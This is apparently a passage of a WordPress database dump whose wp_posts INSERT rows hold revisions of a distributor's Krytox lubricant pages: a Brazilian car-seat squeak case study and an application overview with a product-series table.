INSERT INTO `wp_posts` VALUES (3039, 2, '2016-11-15 19:44:24', '2016-11-15 19:44:24', '<h1>Krytox Automotive Seat Lubrication</h1>\r\n<h2>A Brazilian supplier to the automotive industry improves customer and end-user satisfaction by using specialty lubricant.</h2>\r\n<h4>Automotive seat manufacturer in Brazil reduces squeaks</h4>\r\nA Brazilian manufacturer of automotive seats for luxury vehicles wanted to reduce complaints about squeaks to improve satisfaction among its direct customers and the ultimate end users—the car owners. The goal was to eliminate recalls. <a href="https://www.miller-stephenson.com/product/krytox-gpl-101/">Krytox GPL 101</a> automotive seat lubrication\r\n<h4>The Challenge</h4>\r\nThe area responsible for the annoying squeaks was the metal slides for the headrest. Typically, these slides are not lubricated. However, this manufacturer wanted to deliver the best product possible, exceeding customer expectations. The lubricant needed to be compatible with the metal slides, non-migratory, and easy to apply.\r\n<h4>The Solution</h4>\r\nKrytox™ GPL 101 oil from Chemours is an excellent lubricant that is compatible with all metals. It is easy to brush on to the clean metallic surface during the seat assembly process by using an applicator. What’s more,\r\nbecause Krytox™ GPL 101 oil has low vapor pressure and surface energy, it stays exactly where it’s put.\r\n\r\nKey Advantages\r\n<ul>\r\n 	<li>Using Krytox™ GPL 101 oil, the manufacturer was able to significantly reduce squeaks in automotive seats, improving customer satisfaction and reducing product recalls attributed to this annoying problem.</li>\r\n 	<li>Krytox™ GPL 101 oil provided excellent lubricity to the headrest slides and can also be used in many other automotive applications to reduce squeaks in vehicles ranging from luxury cars to light trucks.</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Krytox GPL Oils" ]', 'Krytox GPL 101 Automotive Seat Lubrication', '', 'inherit', 'closed', 'closed', '', '3036-revision-v1', '', '', '2016-11-15 19:44:24', '2016-11-15 19:44:24', '', 3036, 'https://www.miller-stephenson.com/3036-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3040, 2, '2016-11-15 19:45:03', '2016-11-15 19:45:03', '<h1>Krytox Automotive Seat Lubrication</h1>\n<h2>A Brazilian supplier to the automotive industry improves customer and end-user satisfaction by using specialty lubricant.</h2>\n<h4>Automotive seat manufacturer in Brazil reduces squeaks</h4>\n<p>A Brazilian manufacturer of automotive seats for luxury vehicles wanted to reduce complaints about squeaks to improve satisfaction among its direct customers and the ultimate end users—the car owners. The goal was to eliminate recalls. <a href="https://www.miller-stephenson.com/product/krytox-gpl-101/">Krytox GPL 101</a> automotive seat lubrication</p>\n<h4>The Challenge</h4>\n<p>The area responsible for the annoying squeaks was the metal slides for the headrest. Typically, these slides are not lubricated. However, this manufacturer wanted to deliver the best product possible, exceeding customer expectations. The lubricant needed to be compatible with the metal slides, non-migratory, and easy to apply.</p>\n<h4>The Solution</h4>\n<p>Krytox™ GPL 101 oil from Chemours is an excellent lubricant that is compatible with all metals. It is easy to brush on to the clean metallic surface during the seat assembly process by using an applicator. What’s more,<br />\nbecause Krytox™ GPL 101 oil has low vapor pressure and surface energy, it stays exactly where it’s put.</p>\n<p>Key Advantages</p>\n<ul>\n<li>Using Krytox™ GPL 101 oil, the manufacturer was able to significantly reduce squeaks in automotive seats, improving customer satisfaction and reducing product recalls attributed to this annoying problem.</li>\n<li>Krytox™ GPL 101 oil provided excellent lubricity to the headrest slides and can also be used in many other automotive applications to reduce squeaks in vehicles ranging from luxury cars to light trucks.</li>\n</ul>\n[ux_product_categories ids="45" number="10"]', 'Krytox GPL 101 Automotive Seat Lubrication', '', 'inherit', 'closed', 'closed', '', '3036-revision-v1', '', '', '2016-11-15 19:45:03', '2016-11-15 19:45:03', '', 3036, 'https://www.miller-stephenson.com/3036-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3042, 169, '2016-11-16 14:46:18', '2016-11-16 14:46:18', '', '', '', 'publish', 'closed', 'closed', '', '3042', '', '', '2016-11-16 14:46:19', '2016-11-16 14:46:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/3042/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3043, 170, '2016-11-16 14:51:59', '2016-11-16 14:51:59', '', '', '', 'publish', 'closed', 'closed', '', '3043', '', '', '2016-11-16 14:52:00', '2016-11-16 14:52:00', '', 0, 'https://www.miller-stephenson.com/nf_sub/3043/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3044, 2, '2016-11-16 15:21:31', '2016-11-16 15:21:31', '<h3>Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nTo learn more about Krytox and food grade applications <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">click here.</a>\r\n\r\nFor Automotive solutions <a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">click here.</a>\r\n\r\nKrytox <a href="https://www.miller-stephenson.com/krytox-faq/">FAQ.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/mil-prf-27617-greases/">MIL PRF 27617 Greases</a>\r\n\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nKrytox™ is  a trademark of <a href="https://www.chemours.com/">The Chemours Company</a> FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-11-16 15:21:31', '2016-11-16 15:21:31', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3045, 2, '2016-11-16 15:31:45', '2016-11-16 15:31:45', '<h3>Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nTo learn more about food grade applications <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">click here.</a>\r\n\r\nFor Automotive solutions <a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">click here.</a>\r\n\r\nKrytox <a href="https://www.miller-stephenson.com/krytox-faq/">FAQ.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/mil-prf-27617-greases/">MIL PRF 27617 Greases</a>\r\n\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nKrytox™ is  a trademark of <a href="https://www.chemours.com/">The Chemours Company</a> FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-11-16 15:31:45', '2016-11-16 15:31:45', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3046, 2, '2016-11-16 15:33:32', '2016-11-16 15:33:32', '<h1>Krytox Application Overview</h1>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme 